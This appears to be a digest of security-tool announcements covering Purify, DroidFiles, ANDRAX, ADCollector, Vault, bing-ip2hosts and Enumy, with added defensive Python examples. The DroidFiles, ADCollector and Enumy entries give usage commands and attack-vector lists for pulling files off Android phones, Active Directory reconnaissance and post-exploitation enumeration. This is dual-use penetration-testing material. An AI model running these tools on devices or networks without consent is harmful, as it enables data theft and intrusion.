Purify - All-in-one Tool For Managing Vulnerability Reports From AppSec Pipelines


All-in-one tool for managing vulnerability reports


Why
The goal of Purify is to be an easy-to-use and efficient tool that simplifies the workflow of managing vulnerabilities delivered by various tools.
Purify is designed to analyze the report of any tool, as long as the report is in JSON or XML format. This means you don't need any special plug-ins to process reports from your selection of tools.
Purify is able to remove duplicate results among various vulnerability scanners or tools. In addition, it can combine several results of the same tool based on chosen fields, and this is fully configurable (no coding required). Purify does all this work to reduce the headache of the analyst.
Collect all security findings in one place, review/validate/track them, collaborate, get notifications (Slack), export them into tracking systems (Jira) and so on.
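The deduplication and field-based merging described above, as an added example (not Purify's code): the Python below takes two constructed JSON reports in different layouts, maps each onto canonical fields through a per-tool configuration, then collapses findings that agree on the configured key fields, keeping the highest severity and every tool that reported the issue. Tool names, report layouts and findings are all made up.

```python
import json
from collections import OrderedDict

SEVERITY_RANK = {"info": 0, "low": 1, "medium": 2, "high": 3, "critical": 4}

# Per-tool configuration: where the findings array lives in the report and how that
# tool's field names map onto the canonical fields. Tool names and layouts are
# hypothetical; each real scanner would get its own entry.
TOOL_CONFIG = {
    "scanner_a": {"items": "results",
                  "fields": {"title": "name", "location": "url", "severity": "risk"}},
    "scanner_b": {"items": "findings",
                  "fields": {"title": "vuln_name", "location": "target", "severity": "sev"}},
}

# Constructed sample reports (not real scanner output), one per tool.
SAMPLE_REPORTS = {
    "scanner_a": json.dumps({"results": [
        {"name": "Reflected XSS", "url": "https://app.example/search?q=", "risk": "Medium"},
        {"name": "Reflected XSS", "url": "https://app.example/search?q=", "risk": "Medium"},
        {"name": "Missing HSTS header", "url": "https://app.example/", "risk": "Low"},
    ]}),
    "scanner_b": json.dumps({"findings": [
        {"vuln_name": "reflected xss", "target": "https://app.example/search?q=", "sev": "High"},
        {"vuln_name": "SQL injection", "target": "https://app.example/login", "sev": "Critical"},
    ]}),
}


def normalize(tool, raw_json):
    """Translate one tool's JSON report into a list of canonical finding dicts."""
    cfg = TOOL_CONFIG[tool]
    items = json.loads(raw_json)[cfg["items"]]
    out = []
    for item in items:
        finding = {canon: str(item.get(src, "")).strip() for canon, src in cfg["fields"].items()}
        finding["source"] = tool
        out.append(finding)
    return out


def merge_findings(findings, key_fields=("title", "location")):
    """Collapse findings that agree on key_fields (case-insensitive). The merged
    record keeps the highest severity seen, every tool that reported it and a count."""
    merged = OrderedDict()
    for f in findings:
        key = tuple(f[k].lower() for k in key_fields)
        if key not in merged:
            merged[key] = {"title": f["title"], "location": f["location"],
                           "severity": f["severity"], "sources": [f["source"]], "occurrences": 1}
            continue
        m = merged[key]
        m["occurrences"] += 1
        if f["source"] not in m["sources"]:
            m["sources"].append(f["source"])
        if SEVERITY_RANK.get(f["severity"].lower(), -1) > SEVERITY_RANK.get(m["severity"].lower(), -1):
            m["severity"] = f["severity"]
    return list(merged.values())


def triage(reports, key_fields=("title", "location")):
    """Normalize every report, then deduplicate across all of them."""
    findings = []
    for tool, raw in reports.items():
        findings.extend(normalize(tool, raw))
    return merge_findings(findings, key_fields)


if __name__ == "__main__":
    for row in triage(SAMPLE_REPORTS):
        print(row)
```

The key fields are the knob the page describes as "fully configurable": widening them (adding a parameter name, say) splits findings apart, narrowing them merges more aggressively, and no code changes are needed either way.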

Documentation (WIP)
https://faloker.gitbook.io/purify

Built With
  • Nest - The web framework used
  • Vuetify - Material Component Framework for Vue


DroidFiles - Get Files From Android Directories



Get files from Android directories, internal and external storage (Pictures, Downloads, Whatsapp, Videos, ...)

Legal disclaimer:
Usage of DroidFiles for attacking targets without prior mutual consent is illegal. It's the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

Requirements:
Android Studio (https://developer.android.com/studio)

Usage:
# git clone https://github.com/thelinuxchoice/droidfiles
# cd droidfiles
# bash droidfiles.sh

Author: https://github.com/thelinuxchoice/droidfiles
twitter: https://twitter.com/linux_choice



ANDRAX v5R NH-Killer - Penetration Testing on Android


ANDRAX is a penetration testing platform developed specifically for Android smartphones. ANDRAX has the ability to run natively on Android, so it behaves like a common Linux distribution, but more powerful than a common distribution!

The development of ANDRAX began on 08/09/2016 (DD/MM/YYYY), initially only for people in Brazil.
ANDRAX was fully redefined and reloaded on 05/10/2018 (DD/MM/YYYY), open to the international public.

ANDRAX enables any Android device with root access enabled and a good unlocked ROM to become a weapon for advanced penetration testing.

Why is Android so powerful?

Simple: everyone has a smartphone and spends all their time with it! We have the possibility to blend in easily in the middle of everyone. The processor architecture of most Android smartphones is ARM, a modern and robust architecture extremely superior to the rest. With touch screens we can run the tools with great agility and take advantage of the graphical interface of Android, and we can get in almost anywhere with our smartphones...

In technical terms, ANDRAX and NetHunter should never be compared: ANDRAX is a penetration testing platform for Android smartphones, while NetHunter is just a Debian emulator running in a chroot.

Termux is not our enemy. Termux is an application that allows the installation of many Linux packages using a Debian environment running natively on Android.
ANDRAX and Termux have a similar development; ANDRAX and Termux share many libs and GNU/Linux resources.

But Termux is not a penetration testing platform; it is software to bring the basic tools found in a Debian environment. Penetration tests are not something basic, but advanced techniques that involve advanced tools and an advanced environment to conduct good tests!

So you can install many tools manually in Termux, but it would be extremely difficult to optimize and configure them to reach 100% of the potential required for penetration testing.

Termux runs without root privileges, and this makes it very difficult to use advanced tools.

ANDRAX promotes the use of more than 900 advanced tools for hacking, cracking and penetration testing.

Screenshots







More info in official site.

ADCollector - A Lightweight Tool To Quickly Extract Valuable Information From The Active Directory Environment For Both Attacking And Defending


ADCollector is a lightweight tool that enumerates the Active Directory environment to identify possible attack vectors. It gives you a basic understanding of the configuration and deployment of the environment as a starting point.

Notes:
ADCollector is not an alternative to the powerful PowerView; it just automates enumeration to quickly identify juicy information without much thought at the early recon stage. The functions implemented in ADCollector are meant for enumeration in a large enterprise environment with many users and computers, without generating a lot of traffic or taking a large amount of time. It focuses only on extracting useful attributes, properties and ACLs from the most valuable targets instead of enumerating all available attributes of every user and computer object in the domain. You will definitely need PowerView for more detailed enumeration later.
The aim of developing this tool is to help me learn more about Active Directory security from a different perspective, as well as to figure out what's behind the scenes of those PowerView functions. I just started learning .NET with C#, so the code could be really terrible~
It uses the S.DS namespace to retrieve domain/forest information from the domain controller (LDAP server). It also uses the S.DS.P namespace for LDAP searching.
This tool is still under construction. The features still to be implemented can be seen on my project page.

Enumeration
  • Current Domain/Forest information
  • Domains in the current forest (with domain SIDs)
  • Domain Controllers in the current domain [GC/RODC] (with ~~IP, OS, Site and~~ Roles)
  • Domain/Forest trusts as well as trusted domain objects[SID filtering status]
  • Privileged users (currently in DA and EA group)
  • Unconstrained delegation accounts (Excluding DCs)
  • Constrained Delegation (S4U2Self, S4U2Proxy, Resources-based constrained delegation)
  • MSSQL/Exchange/RDP/PS Remoting SPN accounts
  • User accounts with SPN set & password does not expire account
  • Confidential attributes ()
  • ASREQROAST (DontRequirePreAuth accounts)
  • AdminSDHolder protected accounts
  • Domain attributes (MAQ, minPwdLength, maxPwdAge, lockoutThreshold, gpLink [group policies linked to the current domain object])
  • LDAP basic info(supportedLDAPVersion, supportedSASLMechanisms, domain/forest/DC Functionality)
  • Kerberos Policy
  • Interesting ACLs on the domain object, resolving GUIDs (User defined object in the future)
  • Unusual DCSync Accounts
  • Interesting ACLs on GPOs
  • Interesting descriptions on user objects
  • Sensitive & Not delegate account
  • Group Policy Preference cpassword in SYSVOL/Cache
  • Effective GPOs on the current user/computer
  • Restricted groups
  • Nested Group Membership
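Most of the items in the list above boil down to reading a handful of attributes from user and computer objects, chiefly the userAccountControl bit field. As an added example that is not ADCollector's code, the Python below runs those checks as a hygiene audit over a set of constructed directory objects (the shapes an LDAP search would return, not a real domain; the LDAP query itself is out of scope here). The bit values are the documented userAccountControl flags; the finding labels and the sample account names are this example's own.

```python
# Documented userAccountControl bit values.
UAC_FLAGS = {
    "ACCOUNTDISABLE": 0x0002,
    "WORKSTATION_TRUST_ACCOUNT": 0x1000,
    "SERVER_TRUST_ACCOUNT": 0x2000,               # set on domain controllers
    "DONT_EXPIRE_PASSWORD": 0x10000,
    "TRUSTED_FOR_DELEGATION": 0x80000,            # unconstrained delegation
    "NOT_DELEGATED": 0x100000,                    # "account is sensitive and cannot be delegated"
    "DONT_REQ_PREAUTH": 0x400000,                 # Kerberos pre-authentication not required
    "TRUSTED_TO_AUTH_FOR_DELEGATION": 0x1000000,  # protocol transition (S4U2Self)
}

# Constructed objects in the shape an LDAP search returns them (not a real domain).
SAMPLE_OBJECTS = [
    {"sAMAccountName": "DC01$", "objectClass": "computer",
     "userAccountControl": 0x2000 | 0x80000},
    {"sAMAccountName": "svc_backup", "objectClass": "user",
     "userAccountControl": 0x200 | 0x80000 | 0x10000,
     "servicePrincipalName": ["backup/srv01.lab.example"],
     "description": "Backup service; pass stored in the KB article"},
    {"sAMAccountName": "webapp", "objectClass": "user",
     "userAccountControl": 0x200 | 0x1000000,
     "msDS-AllowedToDelegateTo": ["cifs/fs01.lab.example"]},
    {"sAMAccountName": "legacy", "objectClass": "user",
     "userAccountControl": 0x200 | 0x400000},
    {"sAMAccountName": "da_admin", "objectClass": "user",
     "userAccountControl": 0x200, "adminCount": 1},
    {"sAMAccountName": "old_acct", "objectClass": "user",
     "userAccountControl": 0x200 | 0x0002 | 0x400000},
    {"sAMAccountName": "jdoe", "objectClass": "user", "userAccountControl": 0x200},
]


def decode_uac(value):
    """Return the set of flag names set in a userAccountControl value."""
    return {name for name, bit in UAC_FLAGS.items() if value & bit}


def audit_object(obj, term="pass"):
    """Apply the checks from the enumeration list to one user/computer object.
    Returns a list of finding labels (the labels are this example's own naming)."""
    flags = decode_uac(int(obj.get("userAccountControl", 0)))
    if "ACCOUNTDISABLE" in flags:
        return []                      # disabled accounts are out of scope for this pass
    is_dc = "SERVER_TRUST_ACCOUNT" in flags
    is_user = obj.get("objectClass", "user") == "user"
    findings = []
    if "TRUSTED_FOR_DELEGATION" in flags and not is_dc:
        findings.append("unconstrained-delegation")       # DCs are expected to carry this bit
    if obj.get("msDS-AllowedToDelegateTo"):
        findings.append("constrained-delegation")
    if "TRUSTED_TO_AUTH_FOR_DELEGATION" in flags:
        findings.append("protocol-transition")            # S4U2Self with any protocol
    if obj.get("msDS-AllowedToActOnBehalfOfOtherIdentity"):
        findings.append("resource-based-constrained-delegation")
    if "DONT_REQ_PREAUTH" in flags:
        findings.append("no-preauth")
    if is_user and obj.get("servicePrincipalName"):
        findings.append("user-with-spn")
    if "DONT_EXPIRE_PASSWORD" in flags:
        findings.append("password-never-expires")
    if int(obj.get("adminCount", 0)) == 1:
        findings.append("adminsdholder-protected")
        if "NOT_DELEGATED" not in flags:
            findings.append("privileged-not-marked-sensitive")
    if term.lower() in str(obj.get("description", "")).lower():
        findings.append("description-matches-term")
    return findings


def audit_directory(objects, term="pass"):
    """Map sAMAccountName -> findings for every object that has at least one."""
    report = {}
    for obj in objects:
        findings = audit_object(obj, term)
        if findings:
            report[obj["sAMAccountName"]] = findings
    return report


if __name__ == "__main__":
    for account, findings in audit_directory(SAMPLE_OBJECTS).items():
        print(account, ", ".join(findings))
```

The "privileged-not-marked-sensitive" label is the defensive reading of the page's "Sensitive & Not delegate account" item: AdminSDHolder-protected accounts that lack NOT_DELEGATED are the ones worth fixing first, since their tickets can be forwarded by any host configured for delegation.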

Usage
C:\Users> ADCollector.exe  -h

(ADCollector ASCII-art banner)

v1.1.4 by dev2null

Usage: ADCollector.exe -h

--Domain (Default: current domain)
Enumerate the specified domain

--Ldaps (Default: LDAP)
Use LDAP over SSL/TLS

--Spns (Default: no SPN scanning)
Enumerate SPNs

--Term (Default: 'pass')
Term to search in user description field

--Acls (Default: 'Domain object')
Interesting ACLs on an object

Example: .\ADCollector.exe --SPNs --Term key --ACLs 'CN=Domain Admins,CN=Users,DC=lab,DC=local'

Changelog

v 1.1.1:
1. It now uses S.DS.P namespace to perform search operations, making searches faster and easier to implement. (It also supports paged search. )
2. It now supports searching in other domains. (command line parser is not implemented yet).
3. The code logic is reconstructed, less code, more understandable and cohesive.

v 1.1.2:
1. Separated into three classes.
2. Dispose ldap connection properly.
3. Enumerations: AdminSDHolder, Domain attributes (MAQ, minPwdLength, maxPwdAge, lockOutThreshold, GP linked to the domain object), accounts that don't need pre-authentication.
4. LDAP basic info (supportedLDAPVersion, supportedSASLMechanisms, domain/forest/DC Functionality)
5. SPN scanning (SPNs for MSSQL,Exchange,RDP and PS Remoting)
6. Constrained Delegation enumerations (S4U2Self, S4U2Proxy as well as Resources-based constrained delegation)
7. RODC (group that administers the RODC)

v 1.1.3:
1. Fixed SPN scanning result, privilege accounts group membership
2. Password does not expire accounts; User accounts with SPN set;
3. Kerberos Policy
4. Interesting ACLs enumeration for the domain object, resolving GUIDs
5. DC info is back

v 1.1.4:
1. Some bugs are killed and some details are improved
2. SPN scanning is now optional
3. GPP cpassword in SYSVOL/Cache
4. Interesting ACLs on GPOs; Interesting descriptions on user objects;
5. Unusual DCSync accounts; Sensitive & not delegate accounts
6. Effective GPOs on user/computer
7. Restricted groups
8. Nested Group Membership

Project
For more information (current progress/Todo list/etc) about this tool, you can visit my project page


Vault - A Tool For Secrets Management, Encryption As A Service, And Privileged Access Management


Please note: We take Vault's security and our users' trust very seriously. If you believe you have found a security issue in Vault, please responsibly disclose by contacting us at security@hashicorp.com.

Vault is a tool for securely accessing secrets. A secret is anything that you want to tightly control access to, such as API keys, passwords, certificates, and more. Vault provides a unified interface to any secret, while providing tight access control and recording a detailed audit log.
A modern system requires access to a multitude of secrets: database credentials, API keys for external services, credentials for service-oriented architecture communication, etc. Understanding who is accessing what secrets is already very difficult and platform-specific. Adding on key rolling, secure storage, and detailed audit logs is almost impossible without a custom solution. This is where Vault steps in.
The key features of Vault are:
  • Secure Secret Storage: Arbitrary key/value secrets can be stored in Vault. Vault encrypts these secrets prior to writing them to persistent storage, so gaining access to the raw storage isn't enough to access your secrets. Vault can write to disk, Consul, and more.
  • Dynamic Secrets: Vault can generate secrets on-demand for some systems, such as AWS or SQL databases. For example, when an application needs to access an S3 bucket, it asks Vault for credentials, and Vault will generate an AWS keypair with valid permissions on demand. After creating these dynamic secrets, Vault will also automatically revoke them after the lease is up.
  • Data Encryption: Vault can encrypt and decrypt data without storing it. This allows security teams to define encryption parameters and developers to store encrypted data in a location such as SQL without having to design their own encryption methods.
  • Leasing and Renewal: All secrets in Vault have a lease associated with it. At the end of the lease, Vault will automatically revoke that secret. Clients are able to renew leases via built-in renew APIs.
  • Revocation: Vault has built-in support for secret revocation. Vault can revoke not only single secrets, but a tree of secrets, for example all secrets read by a specific user, or all secrets of a particular type. Revocation assists in key rolling as well as locking down systems in the case of an intrusion.

Documentation, Getting Started, and Certification Exams
Documentation is available on the Vault website.
If you're new to Vault and want to get started with security automation, please check out our Getting Started guides on HashiCorp's learning platform. There are also additional guides to continue your learning.
Show off your Vault knowledge by passing a certification exam. Visit the certification page for information about exams and find study materials on HashiCorp's learning platform.

Developing Vault
If you wish to work on Vault itself or any of its built-in systems, you'll first need Go installed on your machine. Go version 1.13.7+ is required.
For local development, first make sure Go is properly installed, including setting up a GOPATH. Ensure that $GOPATH/bin is in your PATH, as some distributions bundle old versions of the build tools. Next, clone this repository. Vault uses Go Modules, so it is recommended that you clone the repository outside of the GOPATH. You can then download any required build tools by bootstrapping your environment:
$ make bootstrap
...
To compile a development version of Vault, run make or make dev. This will put the Vault binary in the bin and $GOPATH/bin folders:
$ make dev
...
$ bin/vault
...
To compile a development version of Vault with the UI, run make static-dist dev-ui. This will put the Vault binary in the bin and $GOPATH/bin folders:
$ make static-dist dev-ui
...
$ bin/vault
...
To run tests, type make test. Note: this requires Docker to be installed. If this exits with exit status 0, then everything is working!
$ make test
...
If you're developing a specific package, you can run tests for just that package by specifying the TEST variable. In the example below, only the vault package tests will be run.
$ make test TEST=./vault
...

Acceptance Tests
Vault has comprehensive acceptance tests covering most of the features of the secret and auth methods.
If you're working on a feature of a secret or auth method and want to verify it is functioning (and also hasn't broken anything else), we recommend running the acceptance tests.
Warning: The acceptance tests create/destroy/modify real resources, which may incur real costs in some cases. In the presence of a bug, it is technically possible that broken backends could leave dangling data behind. Therefore, please run the acceptance tests at your own risk. At the very least, we recommend running them in their own private account for whatever backend you're testing.
To run the acceptance tests, invoke make testacc:
$ make testacc TEST=./builtin/logical/consul
...
The TEST variable is required, and you should specify the folder where the backend is. The TESTARGS variable is recommended to filter down to a specific resource to test, since testing all of them at once can sometimes take a very long time.
Acceptance tests typically require other environment variables to be set for things such as access keys. The test itself should error early and tell you what to set, so it is not documented here.
For more information on Vault Enterprise features, visit the Vault Enterprise site.


Bing-Ip2Hosts - Bingip2Hosts Is A Bing.com Web Scraper That Discovers Websites By IP Address


Bing-ip2hosts is a Bing.com web scraper to discover hostnames by IP address.

Description
Bing-ip2hosts is a Bing.com web scraper that discovers hostnames by IP address. Bing is the flagship Microsoft search engine, formerly known as MSN Search and Live Search.
It provides a feature unique among search engines: it allows searching by IP address. Bing-ip2hosts uses this feature.
It can be used to discover subdomains and other related domains. It also helps to identify websites hosted in a shared hosting environment. This technique follows best practices during the reconnaissance phase of a penetration test or bug bounty, to expand the target's attack surface.
Unlike many other recon tools that web scrape Bing, this tool has smart scraping behaviour to maximize the discovery of hostnames.

Features
  • Smart scraping behaviour to maximize hostname discovery.
  • Console user interface showing scraping progress.
  • Discovers subdomains and hostnames by IP address.
  • Can search by hostname or IP address.
  • Output with or without URL prefix.
  • Output to file, in list or CSV format.
  • Bing API key not required.
  • Select the search language and market.
  • Specify targets from the commandline or from a file.
  • Lightweight Bash shell script without heavy dependencies.

Bing Web Scraping


Bing provides a feature unique to search engines - it allows searching by IP address. To try this, go to Bing.com and search for IP:40.113.200.201. It should show you results from microsoft.com. If it shows empty results, then add a single dot.

Smart Scraping Behaviour
Unlike other Bing web scrapers that stop after scraping 10 result pages, bing-ip2hosts can scrape thousands of results. It continues scraping search result pages until it no longer finds new results.
Scraping completes when any of the following conditions are met:
  • After a configurable threshold of pages fail to return new results (default: 5).
  • A single page of search results, e.g. 10 or less results.
  • The last page of search results.
  • Empty results.
It also alerts the user when Bing reports that some results have been removed.

Avoid Empty Search Results
If searching by an IP address returns empty search results, add a single dot. Bing-ip2hosts always appends a single dot (%2e) to the query to avoid this issue.
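The stop conditions and the trailing-dot trick above can be expressed as a small state machine. As an added example (not the bing-ip2hosts script itself), the Python below implements them against an offline stand-in for Bing: the fake fetcher returns constructed result pages and can replay page one to mimic the repeating-page behaviour the README describes. It assumes Bing's first result-offset parameter and an `<h2><a href=...>` result anchor; both are assumptions about markup that the real script is what tracks, and nothing here contacts Bing.

```python
import re
from urllib.parse import quote, urlparse

# Result anchors as this example assumes Bing renders them (an assumption; the real
# markup changes over time and the bing-ip2hosts script is what tracks it).
RESULT_LINK = re.compile(r'<h2><a href="(https?://[^"]+)"', re.I)
REMOVED_NOTICE = "Some results have been removed"


def build_search_url(ip, first=1, setlang="en-us", setmkt=None):
    """Query for ip:<address> with the trailing dot (%2e) the tool appends to avoid
    empty results; 'first' is assumed to be Bing's result-offset parameter."""
    url = "https://www.bing.com/search?q=ip%3A{}%2e&first={}&setlang={}".format(
        quote(ip, safe=""), first, setlang)
    if setmkt:
        url += "&setmkt=" + setmkt
    return url


def scrape_hostnames(ip, fetch, max_no_new=5, page_size=10):
    """Walk result pages until one of the README's stop conditions is met.
    'fetch' is any callable mapping a URL to the HTML of that results page."""
    seen, hosts_in_order, notices = set(), [], []
    no_new_pages, pages_fetched, first = 0, 0, 1
    while True:
        html = fetch(build_search_url(ip, first))
        pages_fetched += 1
        if REMOVED_NOTICE in html and "removed" not in notices:
            notices.append("removed")            # alert the user, but keep scraping
        hosts = [urlparse(u).hostname for u in RESULT_LINK.findall(html)]
        hosts = [h for h in hosts if h]
        new = []
        for h in hosts:
            if h not in seen:
                seen.add(h)
                new.append(h)
        hosts_in_order.extend(new)
        if not hosts:
            stop = "empty-results"
            break
        if new:
            no_new_pages = 0
        else:
            no_new_pages += 1                    # Bing handed back an already-seen page
            if no_new_pages >= max_no_new:
                stop = "no-new-results-threshold"
                break
        if len(hosts) < page_size:
            stop = "last-page"                   # a short page is the last (or only) one
            break
        first += page_size
    return {"hosts": hosts_in_order, "pages": pages_fetched, "stop": stop, "notices": notices}


def make_fake_fetcher(pages, loop_back=False, notice_on_page=None):
    """Constructed offline stand-in for Bing: 'pages' is a list of hostname lists.
    With loop_back=True, requests past the end return page 1 again, mimicking the
    repeating-page behaviour described in the README."""
    def fetch(url):
        first = int(re.search(r"first=(\d+)", url).group(1))
        index = (first - 1) // 10
        if index >= len(pages):
            hosts = pages[0] if (loop_back and pages) else []
        else:
            hosts = pages[index]
        body = "".join('<li><h2><a href="https://{0}/">{0}</a></h2></li>'.format(h) for h in hosts)
        if notice_on_page is not None and index == notice_on_page:
            body += "<p>" + REMOVED_NOTICE + "</p>"
        return "<html><body><ol>" + body + "</ol></body></html>"
    return fetch


def page_of(prefix, n):
    """Constructed hostnames for one fake results page."""
    return ["{}{:02d}.example.net".format(prefix, i) for i in range(n)]


if __name__ == "__main__":
    fetch = make_fake_fetcher([page_of("a", 10), page_of("b", 10)], loop_back=True)
    print(scrape_hostnames("203.0.113.10", fetch))
```

With the looping fetcher the scraper collects twenty hostnames from two real pages and then spends five more requests (the default -n threshold) confirming that Bing is only replaying page one before it gives up; a short second page stops it immediately as the last page.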

Search Language and Market
By default this tool specifies the search language as "en-us". The market is left unset, as this seems to maximize results.
The following URL parameters can be configured:
  • setlang (Language)
  • setmkt (Market code)
Both these parameters can affect how many results are returned.
A full list of market codes can be found at docs.microsoft.com/en-us/azure/cognitive-services/bing-web-search/language-support.

Repeating Search Result Pages
Sometimes Bing does not permit the user to reach the end of search result pages.
For example, in a search that shows 3 pages of results, it will not always allow the user to reach the 3rd page. Instead it will return the first page of results. This can be demonstrated by searching for ip:8.8.8.8. Note that it is not always the first page that it returns to.

Help


Use the following command for usage information.
bing-ip2hosts is a Bing.com web scraper that discovers websites by IP address.
Use for OSINT and discovering attack-surface of penetration test targets.

Usage: ./bing-ip2hosts [OPTIONS] IP|hostname

OPTIONS are:
-o FILE Output hostnames to FILE.
-i FILE Input list of IP addresses or hostnames from FILE.
-n NUM Stop after NUM scraped pages return no new results (Default: 5).
-l Select the language for use in the setlang parameter (Default: en-us).
-m Select the market for use in the setmkt parameter (Default is unset).
-u Only display hostnames. Default is to include URL prefixes.
-c CSV output. Outputs the IP and hostname on each line, separated by a comma.
-q Quiet. Disable output except for final results.
-t DIR Use this directory instead of /tmp.
-V Display the version number of bing-ip2hosts and exit.

Installation

Dependencies
bing-ip2hosts requires wget. This is installed by default in Ubuntu Linux and Kali Linux.
It can be installed in macOS with homebrew.
brew install wget
It can be installed in Debian and Ubuntu Linux with apt.
sudo apt install wget

Install
Copy bing-ip2hosts into a folder in your $PATH.
sudo cp ./bing-ip2hosts /usr/local/bin/

Compatibility
Bing-ip2hosts uses the Bash scripting language.
It is known to work with the following systems.
  • Ubuntu Linux
GNU bash, version 4.4.20(1)-release (x86_64-pc-linux-gnu)
Copyright (C) 2016 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>

This is free software; you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
  • macOS Catalina
The version of Bash bundled with macOS was published in 2007 and is the most recent version licenced with GPLv2. More recent versions are licenced with GPLv3, with licence terms that preclude Apple from bundling it in macOS.
GNU bash, version 3.2.57(1)-release (x86_64-apple-darwin19)
Copyright (C) 2007 Free Software Foundation, Inc.

Links

Related Projects
Here's a list of projects that also search Bing by IP address.
Here's a list of other related projects for recon using Bing. Note that these do not search Bing by IP address.

Author
Copyright Andrew Horton, aka urbanadventurer.

Contributing
If you have any ideas, just open an issue and tell me what you think.
If you'd like to contribute, please fork the repository and make changes as you'd like. Pull requests are warmly welcome.

Acknowledgments
This project uses the following opensource packages.


Enumy - Linux Post Exploitation Privilege Escalation Enumeration


Enumy is a portable executable that you drop on a target Linux machine during a pentest or CTF in the post-exploitation phase. Running enumy will enumerate the box for common security vulnerabilities. Enumy has an htop-like ncurses interface or a standard interface for dumb reverse shells.

Installation
You can download the final binary from the release tab (x86 or x64 builds, statically linked against musl). Transfer the final enumy binary to the target machine and run it:
./enumy

Who Should Use Enumy?
  • Pentesters can run it on a target machine to find issues they can raise in their reports.
  • CTF players can use it to identify things that they might have missed.
  • People who are curious to know how many issues enumy finds on their local machine.

Options
$ ./enumy64 -h

(Enumy ASCII-art banner)

------------------------------------------

Enumy - Used to enumerate the target environment and look for common
security vulnerabilities and hostspots

-o <loc> Save results to location
-i <loc> Ignore files in this directory (usefull for network shares)
-w <loc> Only walk files in thi s directory (usefull for devlopment)
-t <num> Threads (default 4)
-f Run full scans
-d Display debugging information
-n Enabled ncurses
-h Show help

Compilation
To compile during development, only make, libcap and the ncurses library are required.
make
To remove the glibc dependency and statically link all libraries (compile with musl), do the following. Note that you will need Docker installed to create the Alpine build environment.
./build.sh 64bit
./build.sh 32bit
./build.sh all
cd output

Scans That've Been Implemented
Below is the ever growing list of scans that have been implemented.

Quick Scan
  • SUID/GUID scans
  • File capabilities
  • Interesting files scan
  • Coredump scan
  • Breakout binary scan

Full Scan
  • Quick Scan
  • Binary analysis

Scan Times
Changing the default number of threads is pretty pointless unless you're running a full scan. A full scan will do a lot more IO so more threads greatly decrease scan times. These are the scan times with a i7-8700k and 2 million files scanned.

Quick Scan Times
  • 2 Thread -> system 70% cpu 54.093 total
  • 2 Thread -> system 121% cpu 26.122 total
  • 4 Thread -> system 289% cpu 15.657 total
  • 8 Threads -> system 468% cpu 15.863 total
  • 12 Thread -> system 420% cpu 20.548 total

Full Scan Times
  • 1 Thread -> system 50% cpu 3:16.38 total
  • 2 Thread -> system 86% cpu 1:33.95 total
  • 4 Thread -> system 165% cpu 47.753 total
  • 8 Threads -> system 366% cpu 29.768 total
  • 12 Thread -> system 467% cpu 29.815 total
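The quick scan items and the threaded scan timings above map onto a simple design: walk the tree once, then classify files in a worker pool. As an added example that is not enumy's C code, the Python below does that for the SUID/SGID, world-writable-executable and core dump checks, honours an ignore list like the -i option, and builds a constructed directory tree to scan (file names are made up; the "binaries" are tiny shell scripts and the core dump is a hand-built ELF header with e_type ET_CORE).

```python
import os
import stat
import struct
import tempfile
from concurrent.futures import ThreadPoolExecutor

ET_CORE = 4   # ELF e_type value for a core dump


def is_elf_core(path):
    """True if the file starts with an ELF header whose e_type is ET_CORE."""
    try:
        with open(path, "rb") as fh:
            hdr = fh.read(18)
    except OSError:
        return False
    if len(hdr) < 18 or hdr[:4] != b"\x7fELF":
        return False
    endian = "<" if hdr[5] == 1 else ">"          # EI_DATA selects byte order
    return struct.unpack(endian + "H", hdr[16:18])[0] == ET_CORE


def classify_file(path):
    """Return the list of quick-scan hits for one path (empty if nothing interesting)."""
    try:
        st = os.lstat(path)                        # lstat: never follow symlinks
    except OSError:
        return []
    if not stat.S_ISREG(st.st_mode):
        return []
    mode, hits = st.st_mode, []
    if mode & stat.S_ISUID:
        hits.append("setuid")
    if mode & stat.S_ISGID:
        hits.append("setgid")
    if (mode & stat.S_IWOTH) and (mode & 0o111):
        hits.append("world-writable-executable")   # anyone can replace what gets executed
    if is_elf_core(path):
        hits.append("coredump")                    # may hold secrets from the crashed process
    return hits


def scan(root, threads=4, ignore=()):
    """Walk 'root' once, then classify every regular file in a worker pool.
    'ignore' lists directories to skip (the equivalent of enumy's -i)."""
    ignore = {os.path.abspath(p) for p in ignore}
    paths = []
    for dirpath, dirnames, filenames in os.walk(root):
        # Prune ignored directories in place so os.walk never descends into them.
        dirnames[:] = [d for d in dirnames if os.path.abspath(os.path.join(dirpath, d)) not in ignore]
        paths.extend(os.path.join(dirpath, f) for f in filenames)
    with ThreadPoolExecutor(max_workers=threads) as pool:
        results = list(pool.map(classify_file, paths))
    return sorted((os.path.relpath(p, root), hits) for p, hits in zip(paths, results) if hits)


def build_fixture():
    """Constructed directory tree standing in for a target filesystem (test data only)."""
    root = tempfile.mkdtemp(prefix="enumy-demo-")

    def put(rel, data=b"#!/bin/sh\nexit 0\n", mode=0o644):
        p = os.path.join(root, rel)
        os.makedirs(os.path.dirname(p), exist_ok=True)
        with open(p, "wb") as fh:
            fh.write(data)
        os.chmod(p, mode)

    core_hdr = b"\x7fELF\x02\x01\x01" + b"\x00" * 9 + struct.pack("<H", ET_CORE) + b"\x00" * 46
    put("usr/bin/passwd-like", mode=0o4755)       # setuid
    put("usr/bin/wall-like", mode=0o2755)         # setgid
    put("opt/app/runner", mode=0o757)             # world-writable and executable
    put("var/crash/core.1234", data=core_hdr)     # ELF core dump
    put("etc/notes.txt")                          # nothing interesting
    put("mnt/share/injected", mode=0o4755)        # setuid, but on an ignored share
    return root


if __name__ == "__main__":
    root = build_fixture()
    for rel, hits in scan(root, threads=4, ignore=[os.path.join(root, "mnt", "share")]):
        print(rel, ", ".join(hits))
```

Like enumy, the walk is single-threaded and only the per-file checks fan out to workers, which is why the page's timings show extra threads paying off mainly on the I/O-heavy full scan.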

How To Contribute
  • If you can think of a scan idea that has not been implemented, raise it as an issue.
  • Make a pull request, making sure that:
    • Each scan is given a unique ID
    • Multiple related scans are in the same file.
    • No more than one scan/test per function.

